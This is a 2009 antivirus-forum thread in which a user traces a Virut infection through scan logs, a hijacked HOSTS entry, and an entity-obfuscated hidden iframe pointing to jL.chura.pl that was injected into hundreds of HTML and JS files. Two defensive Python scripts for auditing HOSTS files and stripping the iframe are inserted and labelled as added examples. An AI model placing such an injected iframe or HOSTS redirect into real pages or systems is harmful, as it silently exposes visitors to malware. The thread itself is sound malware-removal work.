Author Topic: I have something infecting my Vista machine - But Avast reports nothing  (Read 8698 times)


psaxelby

  • Guest
Hi,

Something's got into my Vista PC but despite a complete scan by Avast nothing is found.

The only signs are that I can't go to any microsoft or antivirus site, and the Microsoft 'Process Monitor' tool shows that as soon as I do anything internet related there's a flood of connections to and from 'jl.chura.pl'.

Any ideas please? I've looked around the net and tried loads of things like ComboFix (which fails as it says the file's been compromised, possibly by Virut (not according to Avast)); nothing can tell me what it is.

Any help greatly appreciated.

Paul.

Mr.Agent

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #1 on: August 15, 2009, 01:57:50 AM »
Run Malwarebytes.

Be sure all your things are up to date (anti-virus, anti-spyware, anti-malware, etc.).

Mr.Agent

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89687
  • No support PMs thanks
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #2 on: August 15, 2009, 02:12:57 AM »
This is either a hacked HOSTS file (redirect) or a DNS hijacking.

-- HOSTS file redirect: a common malware tactic is to block AV sites (pointing them at 127.0.0.1), making it difficult to remove malware. Check your HOSTS file using Notepad or a text editor of your choice: C:\WINDOWS\system32\drivers\etc\hosts, or do a search for HOSTS to find it if it isn't there.

Once open, you are looking for entries with avast.com on the line; you may well see other AV sites. Post the contents of the hosts file. http://en.wikipedia.org/wiki/Hosts_file

For the DNS issue:
If you haven't already got this software (freeware), download, install, update and run it and report the findings (it should produce a log file).

Don't worry about reported tracking cookies; they are a minor issue and not one of security, but allow SAS to deal with them though. See http://en.wikipedia.org/wiki/HTTP_cookie.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD - 27" external monitor 1440p 2560x1440 resolution - avast! free  24.9.6130 (build 24.9.9452.762) UI 1.0.818/ Firefox, uBlock Origin Lite, uMatrix/ MailWasher Pro/ Avast! Mobile Security

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #3 on: August 15, 2009, 02:49:13 AM »
Hi guys,

Many thanks for the speedy replies.
I've downloaded the tools mentioned & a few others mentioned in other threads, and am currently scanning with MBAM (although it won't update as the domain's being blocked).

My hosts file looks like this:

127.0.0.1 jL.chura.pl
#6 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
::1             localhost



The line at the top is obviously involved somehow & I'll take it out prior to the next reboot (it'll probably return but I'll give it a go ::) ).
Not sure about the last line - ::1 localhost - should that be there?

Mbam's up to 60k objects atm, so I guess it'll be a while yet. Once it's done I'll run any others I can & get back to you.

Again, many thanks.

Paul

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89687
  • No support PMs thanks
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #4 on: August 15, 2009, 03:50:43 AM »
Yes it is; that is redirecting localhost to a malicious site. Remove that line and save the changes.

As far as I'm aware, the last line is just another notation, ::1 instead of 127.0.0.1; it is related to IPv6, so it should be OK. See http://en.wikipedia.org/wiki/Localhost.
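A small checker for the HOSTS-file redirect DavidR describes and for the ::1 localhost question above, added here as an example (it is not code from any poster): it treats loopback mappings for localhost, including the IPv6 ::1 form, as expected, flags any other name pointed at a loopback or 0.0.0.0 address (the pattern of the 127.0.0.1 jL.chura.pl line), and separately flags security-vendor domains mapped anywhere. The vendor list and the extra www.avast.com line in the sample are assumptions.

```python
"""Audit a Windows HOSTS file for malware-style redirects.

Added example, not from the thread. SAMPLE_HOSTS is constructed from the
file the poster pasted plus one assumed line; WATCHED is an assumed list.
"""
import ipaddress
from typing import Dict, List, Tuple

# Names that legitimately resolve to a loopback address.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost", "ip6-localhost"}

# Security-vendor domains a HOSTS redirect would block (assumed list; extend it).
WATCHED = ("avast.com", "microsoft.com", "windowsupdate.com",
           "malwarebytes.org", "superantispyware.com", "drweb.com")


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (ip, hostname) pairs from HOSTS text, ignoring '#' comments."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # '#' starts a comment
        if not line:
            continue
        parts = line.split()
        for name in parts[1:]:                 # one IP may carry several names
            entries.append((parts[0], name.lower()))
    return entries


def audit_hosts(text: str) -> Dict[str, List[str]]:
    """Classify HOSTS entries.

    redirect: a non-local name pointed at a loopback or 0.0.0.0 address
    watched:  a security-vendor domain mapped to any address (DNS override)
    invalid:  first column is not a parsable IP address
    """
    findings: Dict[str, List[str]] = {"redirect": [], "watched": [], "invalid": []}
    for ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings["invalid"].append(f"{ip} {name}")
            continue
        if name in LOCAL_NAMES and addr.is_loopback:
            continue   # '127.0.0.1 localhost' and '::1 localhost' are expected
        entry = f"{ip} {name}"
        if any(name == d or name.endswith("." + d) for d in WATCHED):
            findings["watched"].append(entry)
        if addr.is_loopback or addr.is_unspecified:
            findings["redirect"].append(entry)
    return findings


# Constructed sample: the poster's lines plus one assumed vendor-blocking line.
SAMPLE_HOSTS = """\
127.0.0.1 jL.chura.pl
127.0.0.1 www.avast.com
# comment lines like this one are ignored
#      102.54.94.97     rhino.acme.com          # source server
127.0.0.1       localhost
::1             localhost
"""

if __name__ == "__main__":
    for kind, hits in audit_hosts(SAMPLE_HOSTS).items():
        for hit in hits:
            print(f"{kind:8} {hit}")
```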

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #5 on: August 15, 2009, 04:35:23 AM »
Hi David,

Well....   I ran mbam:

Malwarebytes' Anti-Malware 1.40
Database version: 2551
Windows 6.0.6001 Service Pack 1

15/08/2009 01:54:26
mbam-log-2009-08-15 (01-54-26).txt

Scan type: Full Scan (C:\|)
Objects scanned: 172900
Time elapsed: 17 minute(s), 0 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 3

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Users\Paul\AppData\Local\Temp\DaemonSearch.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\Windows\Temp\VRT2239.tmp (Malware.Tool) -> Quarantined and deleted successfully.
C:\Windows\Temp\VRT7C12.tmp (Trojan.Downloader) -> Quarantined and deleted successfully.


Great! Got something ;D
About 30 seconds after it had cleaned them a little message popped up (see attached image). I'm getting paranoid now - Is that really from windoze or is it scamware?

I removed the line from the hosts file, rebooted the machine & kept everything crossed.

When it came back up my wallpaper had disappeared ???, I checked the hosts file & the dodgy line was back in there ::)

I ran SuperAntiSpyware which found 47 tracking cookies - Not so bad...
Then I ran the Avast Rootkit tool - Nothing reported.
Then I ran the Dr Web tool (I made the mistake of running it in express mode) and it found this:

inputpersonalization.exe;c:\program files\common files\microsoft shared\ink;Win32.Virut.56;Cured.;
superantispyware.exe;c:\program files\superantispyware;Win32.Virut.56;Cured.;
winmail.exe;c:\program files\windows mail;Win32.Virut.56;Cured.;
wmpnetwk.exe;c:\program files\windows media player;Win32.Virut.56;Cured.;
sidebar.exe;c:\program files\windows sidebar;Win32.Virut.56;Cured.;
ehprivjob.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
ehrecvr.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
ehsched.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
mcupdate.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
explorer.exe;c:\windows;Win32.Virut.56;Cured.;
trustedinstaller.exe;c:\windows\servicing;Win32.Virut.56;Cured.;
alg.exe;c:\windows\system32;Win32.Virut.56;Cured.;
bthudtask.exe;c:\windows\system32;Win32.Virut.56;Cured.;
defrag.exe;c:\windows\system32;Win32.Virut.56;Cured.;
dfdwiz.exe;c:\windows\system32;Win32.Virut.56;Cured.;
dllhost.exe;c:\windows\system32;Win32.Virut.56;Cured.;
fxssvc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
ie4uinit.exe;c:\windows\system32;Win32.Virut.56;Cured.;
locator.exe;c:\windows\system32;Win32.Virut.56;Cured.;
logon.scr;c:\windows\system32;Win32.Virut.56;Cured.;
lpremove.exe;c:\windows\system32;Win32.Virut.56;Cured.;
msdtc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
msfeedssync.exe;c:\windows\system32;Win32.Virut.56;Cured.;
msiexec.exe;c:\windows\system32;Win32.Virut.56;Cured.;
racagent.exe;c:\windows\system32;Win32.Virut.56;Cured.;
raserver.exe;c:\windows\system32;Win32.Virut.56;Cured.;
regsvr32.exe;c:\windows\system32;Win32.Virut.56;Cured.;
rundll32.exe;c:\windows\system32;Win32.Virut.56;Cured.;
sc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
searchfilterhost.exe;c:\windows\system32;Win32.Virut.56;Cured.;
searchprotocolhost.exe;c:\windows\system32;Win32.Virut.56;Cured.;
snmptrap.exe;c:\windows\system32;Win32.Virut.56;Cured.;
ui0detect.exe;c:\windows\system32;Win32.Virut.56;Cured.;
unregmp2.exe;c:\windows\system32;Win32.Virut.56;Cured.;
userinit.exe;c:\windows\system32;Win32.Virut.56;Cured.;
vds.exe;c:\windows\system32;Win32.Virut.56;Cured.;
vssvc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
winmgmt.exe;c:\windows\system32\wbem;Win32.Virut.56;Cured.;
wmiapsrv.exe;c:\windows\system32\wbem;Win32.Virut.56;Cured.;
wbengine.exe;c:\windows\system32;Win32.Virut.56;Cured.;
wermgr.exe;c:\windows\system32;Win32.Virut.56;Cured.;
wsqmcons.exe;c:\windows\system32;Win32.Virut.56;Cured.;



 :o :o :o

Why on earth didn't Avast catch that lot? I'd done a couple of complete boot-time scans.

I'm currently running Dr Web in 'Complete scan' mode, it's about 30% and so far it's found another 62. All 'Virut 56' except for a couple of possible script viruses and a VBS.Generic.45.
UPDATE: The final count was 1173
I'll let you know whether this stops the redirection once it finishes.

Thanks again,

Paul.
« Last Edit: August 15, 2009, 05:29:59 PM by psaxelby »

cinchez

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #6 on: August 15, 2009, 05:32:00 AM »
Haven't seen that pop-up before in my Vista...

Possibly a scareware?

Maybe you should google about it ^^ (I'm going to ^^)

-AnimeLover^^

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #7 on: August 15, 2009, 02:38:06 PM »
Hi Addict,

Best bit of info I've found on that dialogue box came from Stephen Holm and can be found here http://social.microsoft.com/Forums/en-US/genuinevista/thread/2e1030fb-9830-4705-850f-b0c332afb40d.

As to the virus problem - running all tests again, will report shortly.

Regards,
Paul

micky77

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #8 on: August 15, 2009, 03:31:50 PM »
If you have Virut, and it certainly looks like it, I'm afraid you're wasting your time. Your efforts would be better spent wiping the PC, including all partitions, and re-installing Windows.

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #9 on: August 15, 2009, 05:25:17 PM »
Hi,

micky77 - Did that very recently & it came back - I'd like to learn how to kill the bugger, otherwise I'm afraid I'll just be doing rebuild after rebuild...

Update.

MBAM reports nothing.
Avast boot scan & rootkit scan report nothing.
Dr Web reports nothing.
SAS reports nothing.
RootRepeal: the only things I'm not sure about are:

Path: C:\Windows\System32\wbem\CLFSUN~1.MOF
Status: Locked to the Windows API!

Path: c:\windows\winsxs\x86_wcf-m_svc_mod_op_perf_c_ini_31bf3856ad364e35_6.0.6001.18000_none_c3627a1d2f590916\_servicemodeloperationperfcounters_d.ini
Status: Allocation size mismatch (API: 245760, Raw: 56)

Path: c:\windows\winsxs\x86_wcf-m_svc_mod_svc_perf_ini_31bf3856ad364e35_6.0.6001.18000_none_7aa3ffe08cb3c55b\_servicemodelserviceperfcounters_d.ini
Status: Allocation size mismatch (API: 561152, Raw: 56)


Norman reports nothing.
My hosts file now remains unmolested through a reboot.

The internet traffic to & from jl.chura.pl has stopped**
I can now access all internet av sites that were blocked before.


**
The ONLY apparent remaining part of the problem is one that I didn't get before.
When I start up and log on - and only then - I get a double message from Avast's network shield saying that a redirect attempt to jl.chura.pl/ru has been blocked.

Anyone got any ideas on this last little(?) symptom? Is there any way of getting Avast to tell which process made the attempt? (Is there any way that Avast would be able to find out?)

If anyone's got an idea I'd be grateful to hear it - It feels like this is nearly licked...
(Famous last words I know...)

Many thanks,
Paul

Offline mathboyx215

  • Avast Evangelist
  • Poster
  • ***
  • Posts: 449
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #10 on: August 15, 2009, 06:37:48 PM »
Can you post the full RootRepeal log?
It is not possible to divide anything by zero

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #11 on: August 15, 2009, 07:32:18 PM »
Hi mathboy,

Sure can - attached as a tab-delimited text file (over 2k lines).

That OK?

Many thanks,
Paul

P.S. I had to merge all the separate logs as the full report didn't include all elements or even all lines from each element.
There is one report missing from the file, can't remember which it was but the scan came up completely empty.
« Last Edit: August 15, 2009, 07:43:42 PM by psaxelby »

Offline mathboyx215

  • Avast Evangelist
  • Poster
  • ***
  • Posts: 449
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #12 on: August 15, 2009, 08:47:38 PM »
Can't see anything wrong in your RootRepeal log.
Can you please update Malwarebytes and run a full scan?
Then post back a log from it.

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #13 on: August 16, 2009, 12:08:45 AM »
Hi,

Thanks again for the help.

Here's the malwarebytes log:

Malwarebytes' Anti-Malware 1.40
Database version: 2630
Windows 6.0.6001 Service Pack 1

15/08/2009 22:50:51
mbam-log-2009-08-15 (22-50-51).txt

Scan type: Full Scan (C:\|)
Objects scanned: 192322
Time elapsed: 20 minute(s), 2 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



And just for good measure, here's the HijackThis log:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:55:40, on 15/08/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\SYSTEM32\WISPTIS.EXE
C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Secunia\PSI\psi.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\Program Files\Internet Explorer\ieuser.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\Macromed\Flash\FlashUtil10c.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [OpAgent] "OpAgent.exe" /agent
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - HKCU\..\Run: [ISUSPM] C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Startup: drivemap.bat
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O13 - Gopher Prefix:
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O22 - SharedTaskScheduler: Windows DreamScene - {E31004D1-A431-41B8-826F-E902F9D95C81} - C:\Windows\System32\DreamScene.dll
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

--
End of file - 4746 bytes



Given other HJT logs I've seen, I'd expected it to have been much bigger...
Anything there?


BTW, in that RootRepeal log, what's with the entries that have a size mismatch reported? Is that a file system problem?


Many thanks,
Paul.

psaxelby

  • Guest
Re: I have something infecting my Vista machine - But Avast reports nothing
« Reply #14 on: August 16, 2009, 05:24:19 PM »
UPDATE:

Re: The last visible sign of the infections - The block of attempted access to jl.chura.pl/ru

I had shut down the Sidebar & stopped it loading on startup, & I no longer got the message about attempted access of the site.
I then did a little search for jl.chura in the contents of the Sidebar folder's files & it flagged up contacts.html in the 'Contacts' widget folder.
When I searched in the file, though, it said not found. I scrolled through it and found an obfuscated link to the site at the bottom:


<!--
////////////////////////////////////////////////////////////////////////////////
//
//  THIS CODE IS NOT APPROVED FOR USE IN/ON ANY OTHER UI ELEMENT OR PRODUCT COMPONENT.
//  Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
//
////////////////////////////////////////////////////////////////////////////////
-->

<html>
<head>
...
...
</head>

<body onLoad="myOnLoad();" scroll="no">
.....
.....
    <div id="L_LOCEARCHWORD_text" style="display:none">Search</div>
  
<iframe src="http://jL.ch&#85;ra.pl&#47;rc/" width=1 height=1 frameborder=0></iframe>
</body>
     <script src="js/contacts.js" type="text/javascript" language="javascript"></script>
</html>


So every time Windows loaded & the Sidebar started up it linked to the chura site.

I then did the same search on the whole drive & it flagged 458 files - Mostly html, js, & aspx.
Apart from a few binary files (that I'm still trying to find out why they were flagged as the text appears nowhere inside when viewed as text) they all contain the same iframe block inserted near the end of any body block.

Now all I have to do is remove the link from all these files...  :-[
I wish I could remember more grep commands than I can...  :(

Once these links are gone - I think I'm clean.
 
Anyone got a script I can give a list of files & a line of text to be removed to?

Regards,
Paul
« Last Edit: August 16, 2009, 05:27:05 PM by psaxelby »
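A cleanup script for the injected iframe the poster found, added here as an example (it is not code from any poster or vendor): it decodes the HTML entities in each iframe's src attribute (so jL.ch&#85;ra.pl&#47;rc/ is read as jL.chura.pl/rc/, which is why a plain text search misses it), removes only iframes whose decoded host matches the indicator you pass on the command line, leaves other iframes alone, and rewrites the listed files in place with a .bak copy. The sample HTML and the legitimate help.html iframe in it are constructed.

```python
"""Strip an entity-obfuscated injected <iframe> from HTML/JS/ASPX files.
Added example, not from the thread. SAMPLE_HTML is constructed around the
iframe the poster quoted; the 'help.html' iframe is an assumed legitimate one.
Usage: python strip_iframe.py jl.chura.pl file1.html file2.js ...
"""
import html
import re
import sys
from pathlib import Path
from typing import Optional, Tuple
from urllib.parse import urlsplit

# One <iframe ...> tag plus its optional closing tag; DOTALL lets attributes
# span lines.  Whitespace is consumed only when a closing tag follows it.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>(?:\s*</iframe>)?", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)


def iframe_host(tag: str) -> Optional[str]:
    """Lower-cased host of an iframe tag's src after entity decoding, or None."""
    m = SRC_RE.search(tag)
    if not m:
        return None
    raw = next(g for g in m.groups() if g is not None)
    # Entity decoding is what defeats the obfuscation:
    # "http://jL.ch&#85;ra.pl&#47;rc/" -> "http://jL.chura.pl/rc/"
    host = urlsplit(html.unescape(raw)).hostname
    return host.lower() if host else None


def strip_injected_iframes(text: str, bad_host: str) -> Tuple[str, int]:
    """Remove every iframe whose decoded src host is bad_host; return (text, count)."""
    bad_host = bad_host.lower()
    removed = 0

    def repl(m):
        nonlocal removed
        if iframe_host(m.group(0)) == bad_host:
            removed += 1
            return ""
        return m.group(0)          # unrelated iframes are left untouched

    return IFRAME_RE.sub(repl, text), removed


def clean_file(path: Path, bad_host: str) -> int:
    """Rewrite one file in place (keeping a .bak copy); return iframes removed."""
    raw = path.read_bytes()        # bytes round-trip keeps CRLF and odd encodings
    cleaned, n = strip_injected_iframes(raw.decode("utf-8", "surrogateescape"), bad_host)
    if n:
        path.with_suffix(path.suffix + ".bak").write_bytes(raw)
        path.write_bytes(cleaned.encode("utf-8", "surrogateescape"))
    return n


# Constructed sample: the injected tag as quoted, beside an assumed legitimate one.
SAMPLE_HTML = """<body onLoad="myOnLoad();" scroll="no">
    <div id="L_LOCEARCHWORD_text" style="display:none">Search</div>
    <iframe src="help.html" width=200 height=100></iframe>
<iframe src="http://jL.ch&#85;ra.pl&#47;rc/" width=1 height=1 frameborder=0></iframe>
</body>
"""

if __name__ == "__main__":
    for name in sys.argv[2:]:
        print(f"{clean_file(Path(name), sys.argv[1]):4d}  {name}")
```

Run it against the list of flagged files with the host as the first argument; the count printed per file tells you which ones actually carried the iframe.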